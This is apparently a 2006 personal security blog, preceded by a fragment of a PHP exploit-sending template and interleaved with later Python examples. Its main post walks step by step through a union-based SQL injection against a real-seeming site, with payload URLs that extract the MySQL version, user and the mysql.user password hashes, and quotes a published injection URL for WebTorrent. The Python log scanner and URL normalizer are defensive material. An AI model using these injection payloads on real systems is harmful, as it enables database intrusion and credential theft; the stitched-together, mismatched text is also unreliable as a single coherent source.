  for ($i = 0; $i <= strlen($string) - 1; $i++)
  {
    // non-printable bytes are shown as '.', printable ones as themselves
    if ((ord($string[$i]) <= 32) | (ord($string[$i]) > 126))
    { $result .= "  ."; }
    else
    { $result .= "  " . $string[$i]; }
    // hex column, zero-padded to two digits
    if (strlen(dechex(ord($string[$i]))) == 2)
    { $exa .= " " . dechex(ord($string[$i])); }
    else
    { $exa .= " 0" . dechex(ord($string[$i])); }
    $cont++; if ($cont == 15) { $cont = 0; $result .= "\r\n"; $exa .= "\r\n"; }
  }
  return $exa . "\r\n" . $result;
}

$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}

$url = " ";   // path of the target script, left blank in the template
$packet = "POST " . $url . " HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);

Thursday, September 28, 2006

New Quarter schedule

The new quarter began yesterday, and the busy life started again. I chose some dummy courses like microeconomics and English, just to fulfill the general requirements for graduation. It sucks! I hate the rules of this kind of stupid game: you always need a degree or cert to get your resume sharp, or no one is gonna care about you or they simply ignore your existence no matter how superb you are. I guess this is the reality, so I should not complain any more. All rite, so I scheduled to sharpen my programming skills in PHP, Perl, C++ (just starting to learn).... Inspired by the idea of rgod, I felt the strength of the PHP CLR; its rich module support, as well as Perl's and Python's, is huge enough to get most web-application-based exploits working perfectly. Besides these, it is mature to pay attention to open source applications; finding bugs and coding exploits and patches are considered to be the quick and dirty way to win in the community (and you certainly have to do things like HD, who founded an awesome project like Metasploit...). I see the distance between me and the gurus; it drives me to keep catching up and never stop! All rite, pretty much about it.

p.s.: thanks, brother, for reminding me to keep up blogging.

Wednesday, August 16, 2006

Excited about the honeypot project

I got really excited when I saw the honeypot project. I was planning to read TCP/IP protocol vol 1 by the beginning of the quarter, but it turned out I spent so much time on scripting (perl, python, php, pentesting, database... 4P -.-). Well, it is the best time to grab a BSD or dig more into Slackware, since my desktop XP crashed. It must be so much fun to set up a honeypot and host a site on the desktop, to see how people do stuff on my machine and let them hack. And I really need to study C, C++ and ASM, especially how to debug applications and reverse engineer them.... Oops, and I need to get my web fingerprinting paper done ASAP.


http://www.honeynet.org/scans/scan34/

MySQL system-functions summary

Dirty summary of MySQL system functions, mainly for DBAs or pen testers:

  • found_rows() - returns the current table row numbers
  • last_insert_id() - for auto_increment parameters, this is somewhat helpful
  • user() - this is extremely useful; it returns the current username (e.g. root -> then you can smile ^^)
  • database() - this is cool too; it gives back the current database name, easing the pain of spending hours finding it.
  • version() - This is awesome; you all know MySQL 3, 4 and 5 are different and have some unique features. Without knowing the version, you might be stuck for more hours.
  • connection_id() - Well, you can guess how busy this database is
  • INET_ATON(ip) - Not really useful for pentesting
And some password functions:
  • password($pwd) - encrypts a specified string as a 41-byte hash value; it is a pretty weak algorithm
  • md5($pwd) - MD5 encryption, possibly crackable
  • sha($pwd) - SHA encryption, possibly crackable (sha1 version, which means you can use sha1($pwd) to get the same result)
Might not be complete... correct me!

MySQL injection try

Another quick note on a MySQL injection I experimented with today; this is a classic MySQL injection:

With a URL http://www.site.com/script.php?ID=2885:
changing parameter ID to -1 returns a normal response,
making it a gives Unknown column 'a' in 'where clause',
with 1.1 it works fine...
so this means this parameter is a numeric type: decimal, float, double, int, bigint, or smallint....
(remember that decimal has three types: NUMERIC, DEC, FIXED...... um.... can't remember other details)
Then craft a union clause, http://www.site.com/script.php?ID=2885%20union/**/select/**/0/*,
which returns a mismatched number of columns; keep adding till a normal page returns.... (should code it up to automate the whole process.... someone must have done one, Google!!)

http://www.site.com/script.php?ID=28851=2%20union%20select%2051,2,3,34,75736572,75,31,30,29,28,27,26,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1/*

Now I got 342E312E3138:
mysql> select 0x342E312E3138
    -> ;
+----------------+
| 0x342E312E3138 |
+----------------+
| 4.1.18         |
+----------------+

Um... it is MySQL 4.1.18...

Same idea,

http://www.site.com/script.php?ID=28851=2%20union%20select%2051,2,3,34,75736572,hex(user()),31,30,29,28,27,26,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1/*

mysql> select 0x726F6F74406C6F63616C686F7374
    -> ;
+--------------------------------+
| 0x726F6F74406C6F63616C686F7374 |
+--------------------------------+
| root@localhost                 |
+--------------------------------+
Running with root privileges...

Next, submit
http://www.site.com/script.php?ID=28851=2%20union%20select%2051,343,3,34,75736572,hex(version()),31,30,29,28,27,26,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1/**/from/**/user/*

to test the existence of a user table; it doesn't exist. However, it exposed the table name, so it is bruteforceable (construct a txt with a list of possible table names, grab the status codes, sort out the results...). I later found out that calling database() yields the same result.


I am curious what the system is (presumably Linux; I just want to confirm it), so a quick banner grab indicates this is a Unix host, and port scanning found that telnet is open; another banner grab shows it is FreeBSD/i386.... All these clues show I can simply skip trying Windows paths for dumping...

OK.... time to do homework; resume after the test. Next I should try to hex, ord or chr some column fields to bypass the int scheme, and figure out which fields are user and pass, check exploits for this specific version of MySQL (I won't do this for sure, script kiddie shit) or probably dump out a guest-readable file (need to know its physical path to do so; how? phpinfo() might be a way to go, but it can't be converted to digits.... -.-)

Well, all this seems a bit script-kiddie stuff, but I learnt the idea behind it and how to secure PHP code; I am still not feeling comfortable with MySQL injection, though... while PHP and MySQL are playing a pretty important role in the market, I just have to confront and master it.

OK...
Resuming yesterday's work.
Someone found a SQL bug in

WebTorrent (WTcom) Script <= 0.2.4
http://[SITE]/torrents.php?mode=category&cat=0%20union%20select%20null,null,concat(username,char(32),password,char(32),email)%20from%20users%20/*



This inspired me to submit

http://www.site.com/script.php?ID=2885=2%20union%20select%2051,2,3,34,hex(concat(user,char(32),password,char(32))),2,31,30,29,28,27,26,25,24,23,22,21,20,19,18,17,16,15,14,13,12,11,10,9,8,7,6,5,4,3,2,1%20from%20mysql.user/*

Cool! It dumped out the user and password in hex.... Now the task is done; it can be connected to remotely, and the next step would be to hook up and see the inside, which I am not intending to do. All these tries are solely to practise my skills.... All the techniques are fully described in most whitepapers, which can be found somewhere online!

Lessons Learnt:

  • all built-in functions (hex, char, oct, ascii, system, database, user) can get the task done more easily.
  • /**/ comment delimiter
  • Put in a ' single quote
  • Place and 1=1, and 1=0 (blind SQL injection)
  • Change the charset with hex, char, ascii, oct for converting data types
  • Use system functions for probing the database info
  • Check if the connection can be made remotely
  • Use automated tools (e.g. sqlbf... brute force will show up in the log and be detected by the admin.)
  • Many more....
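Seen from the admin's side of the log mentioned in the last lesson, here is an added example (not code from this post) of a small Python scanner that looks for the probes walked through above, including the system and encoding function names from the summary, in access-log lines. The log lines, the numeric parameter name ID and the rule names are constructed for the example.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines (Apache combined-style); the targets mirror the post's probes.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Sep/2006:10:01:02 +0000] "GET /script.php?ID=2885 HTTP/1.1" 200 5120
10.0.0.5 - - [20/Sep/2006:10:01:09 +0000] "GET /script.php?ID=a HTTP/1.1" 500 312
10.0.0.5 - - [20/Sep/2006:10:01:15 +0000] "GET /script.php?ID=2885%20union/**/select/**/0/* HTTP/1.1" 500 290
10.0.0.5 - - [20/Sep/2006:10:02:40 +0000] "GET /script.php?ID=2885%20and%201=1 HTTP/1.1" 200 5120
10.0.0.5 - - [20/Sep/2006:10:03:01 +0000] "GET /script.php?ID=-1%20union%20select%201,hex(user()),3/* HTTP/1.1" 200 5104
10.0.0.9 - - [20/Sep/2006:10:05:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048
"""

NUMERIC_PARAMS = {"ID"}  # parameters the application only ever uses as numbers
# Keyword rules, run on the decoded value after /**/ comments are turned into spaces.
RULES = [
    ("union-select", re.compile(r"\bunion\b.*\bselect\b")),
    ("boolean-probe", re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+")),
    ("system-function", re.compile(r"\b(?:user|database|version|connection_id)\s*\(")),
    ("encoding-function", re.compile(r"\b(?:hex|char|ascii|concat)\s*\(")),
]
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def inspect_target(target: str) -> list[str]:
    """Return the sorted rule names matched by the query parameters of one request target."""
    hits = set()
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = unquote(value).lower()  # parse_qsl decoded once; again for double encoding
        if name in NUMERIC_PARAMS and not re.fullmatch(r"-?\d+(?:\.\d+)?", decoded):
            hits.add("non-numeric-id")  # the post's numeric-type test, applied as a check
        if "/*" in decoded or "--" in decoded:
            hits.add("sql-comment")
        stripped = re.sub(r"/\*.*?\*/", " ", decoded)
        for rule, pattern in RULES:
            if pattern.search(stripped):
                hits.add(rule)
    return sorted(hits)

def scan_log(text: str) -> list[tuple[str, str, list[str]]]:
    """Return (client ip, request target, matched rules) for every suspicious line."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and (hits := inspect_target(m.group("target"))):
            findings.append((m.group("ip"), m.group("target"), hits))
    return findings

if __name__ == "__main__":
    for ip, target, hits in scan_log(SAMPLE_LOG):
        print(ip, target, ", ".join(hits))
```

The benign requests (a plain ID and the index page) produce no findings, while each probe is tagged with every rule it trips, so a single source hitting several rules in sequence stands out.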

Funny browser

Quick note, solely for reminding myself....
www.google.com
dec:1113982819
hexdec:42660763
Hex:7777772E676F6F676C652E636F6D
md5:0a137b375cc3881a70e186ce2172c8d1
binary:0111011101110111011101110010111001100111011011110110111101100111011011000110010100101110011000110110111101101101
base64:d3d3Lmdvb2dsZS5jb20=

Firefox and IE respond differently to each, and both accept dec... When binary is input to Firefox, it will automatically place keyword:_binary_here_; I guess this might have something to do with its built-in Google default search engine, which loads up when it can resolve the string, or I loaded some third-party library.
Anyway, it is funny and somehow exposes the mechanism of browsers.... Different browsers respond differently, and crafted input or code can smash them; that is the lesson I learnt from it. I should dig more later....

URL: http://www.technicalinfo.net/papers/URLEmbeddedAttacks.html
White paper about URL encoding... To be read.
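As an added example that is not part of the post: a Python normalizer that maps the alternative spellings listed above (decimal and hex integer IPv4, and hex, binary or base64 text) to one canonical form before an allowlist or log comparison is made. The dotted quad 66.102.7.99 is just the post's dec and hexdec values converted; the function name, the ordering of the checks and the hostname character set are my assumptions.

```python
import base64
import ipaddress
import re
from typing import Optional

# The binary spelling of www.google.com from the post, joined into one string.
BINARY_FORM = ("0111011101110111011101110010111001100111011011110110"
               "111101100111011011000110010100101110011000110110111101101101")

def _hostname_text(raw: bytes) -> Optional[str]:
    """Decode bytes as a plain hostname, or None if a byte is not a hostname character."""
    text = raw.decode("ascii", errors="replace").lower()
    return text if re.fullmatch(r"[a-z0-9.-]+", text) else None

def canonical_host(raw: str) -> str:
    """Map one address-bar spelling to a canonical form for allowlist or log comparison.

    Order mirrors how a browser reads a bare number: decimal or 0x hex integers
    become dotted-quad IPv4 first, then dotted quads are validated, then hex,
    binary and base64 encodings of a hostname are decoded; anything else is
    only lowercased. Decoded forms are returned in their canonical spelling.
    """
    s = raw.strip()
    m = re.fullmatch(r"0[xX]([0-9a-fA-F]{1,8})|([0-9]{1,10})", s)
    if m:
        value = int(m.group(1), 16) if m.group(1) else int(m.group(2))
        if value <= 0xFFFFFFFF:
            return str(ipaddress.IPv4Address(value))
    try:
        return str(ipaddress.IPv4Address(s))  # rejects malformed dotted quads
    except ValueError:
        pass
    if re.fullmatch(r"[01]{16,}", s) and len(s) % 8 == 0:
        text = _hostname_text(int(s, 2).to_bytes(len(s) // 8, "big"))
        if text:
            return text
    if re.fullmatch(r"[0-9a-fA-F]+", s) and len(s) % 2 == 0:
        text = _hostname_text(bytes.fromhex(s))
        if text:
            return text
    if re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", s) and len(s) % 4 == 0:
        try:
            text = _hostname_text(base64.b64decode(s, validate=True))
        except ValueError:  # binascii.Error is a ValueError
            text = None
        if text:
            return text
    return s.lower()
```

A filter that compares raw address strings against an allowlist or blocklist misses every one of these spellings; comparing canonical_host() output catches them all with one entry.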

Tuesday, August 15, 2006

Web server fingerprinting

I have decided to write a paper on web server fingerprinting, primarily aimed at some popular web servers. I know this topic has been done several times and tons of tools are available to make the whole process fairly easy; however, I have observed some new techniques released recently which are starting to influence the current situation. Since the web is getting important, how to defend and attack web services and servers is extremely hot, and in fact the hottest and most critical topic for every IT pro, security professional and programmer. If you have any thoughts or constructive ideas on this topic, shoot me an email or drop a note here, and I will get back to you.

Monday, August 14, 2006

First post...little testing....
I will post my personal thoughts here..